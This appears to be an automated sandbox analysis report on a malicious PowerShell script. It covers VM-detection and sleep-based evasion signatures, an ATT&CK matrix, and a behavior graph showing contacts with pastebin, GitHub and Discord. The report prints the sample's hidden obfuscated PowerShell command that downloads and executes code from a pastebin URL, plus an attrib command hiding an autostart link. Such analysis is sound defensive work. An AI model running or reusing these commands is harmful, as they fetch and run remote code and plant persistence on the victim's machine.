Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4704Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5137Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1362Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 868Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4196Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5542Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1011
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 467
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3931
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5887
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4996Thread sleep time: -15679732462653109s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612Thread sleep count: 1362 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548Thread sleep count: 868 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 344Thread sleep count: 142 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6712Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304Thread sleep count: 4196 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304Thread sleep count: 5542 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984Thread sleep time: -25825441703193356s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep count: 1011 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448Thread sleep count: 467 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1464Thread sleep count: 192 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1820Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5064Thread sleep count: 3931 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2424Thread sleep count: 5887 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1068Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000000.00000002.2149302857.0000021C5D032000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: powershell.exe, 00000000.00000002.2180083104.0000021C772A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: powershell.exe, 0000000F.00000002.2475071498.000002D1B7DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll++2
Source: powershell.exe, 0000000A.00000002.2399045407.000001986F954000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B3F.tmp" "c:\Users\user\AppData\Local\Temp\j0w3v5ey\CSCE8CC0B62BF5148F19D819A5B292CA929.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		131
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials13
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534235 Sample: cr_asm2.ps1 Startdate: 15/10/2024 Architecture: WINDOWS Score: 88 43 pastebin.com 2->43 45 raw.githubusercontent.com 2->45 47 discord.com 2->47 55 Suricata IDS alerts for network traffic 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Sigma detected: Suspicious PowerShell Parameter Substring 2->59 63 2 other signatures 2->63 8 powershell.exe 1 31 2->8         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 1 2->15         started        signatures3 61 Connects to a pastebin service (likely for C&C) 43->61 process4 dnsIp5 53 discord.com 162.159.137.232, 443, 49737, 49761 CLOUDFLARENETUS United States 8->53 39 C:\Users\user\AppData\...\j0w3v5ey.cmdline, Unicode 8->39 dropped 41 C:\ProgramData\...\BeginSync.lnk, MS 8->41 dropped 67 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->67 69 Suspicious powershell command line found 8->69 71 Tries to open files direct via NTFS file id 8->71 73 Powershell creates an autostart link 8->73 17 csc.exe 3 8->17         started        19 conhost.exe 8->19         started        21 attrib.exe 1 8->21         started        23 powershell.exe 7 13->23         started        26 conhost.exe 1 13->26         started        28 powershell.exe 15->28         started        30 conhost.exe 1 15->30         started        file6 signatures7 process8 signatures9 32 cvtres.exe 1 17->32         started        65 Suspicious powershell command line found 23->65 34 powershell.exe 14 13 23->34         started        37 powershell.exe 28->37         started        process10 dnsIp11 49 raw.githubusercontent.com 185.199.111.133, 443, 49739, 49740 FASTLYUS Netherlands 34->49 51 pastebin.com 172.67.19.24, 443, 49736, 49738 CLOUDFLARENETUS United States 34->51

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cr_asm2.ps10%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://crl.microsoft0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://crl.m0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
